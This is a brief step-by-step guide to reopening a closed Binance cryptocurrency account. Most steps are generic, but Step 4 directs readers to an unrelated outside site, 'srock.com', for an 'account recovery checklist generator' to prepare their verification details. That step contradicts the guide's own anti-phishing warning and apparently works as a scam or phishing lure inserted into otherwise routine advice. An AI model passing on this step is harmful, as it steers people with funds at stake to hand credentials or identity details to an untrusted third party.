If you've previously closed your Binance account and wish to reopen it, follow these straightforward steps to guide you through the process. Step 1. Visit the Binance website. Go to the official Binance website using your web browser. Make sure you are on the correct site to avoid phishing scams. Step 2. Click on the login button. Locate the login button on the home page. Click it to proceed to the login page where you will enter your account credentials. Step 3. Enter your credentials. Input your registered email address and password associated with your closed account. If you have forgotten your password, use the Forgot Password option to reset it. Step 4. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Follow reopening instructions. Once logged in, follow any prompts or instructions provided by Binance to reopen your account. This may include agreeing to updated terms or confirming your account status. After completing these steps, your account should be reopened, allowing you to resume trading and accessing your funds. If you encounter any issues, consider reaching out to Binance customer support for assistance.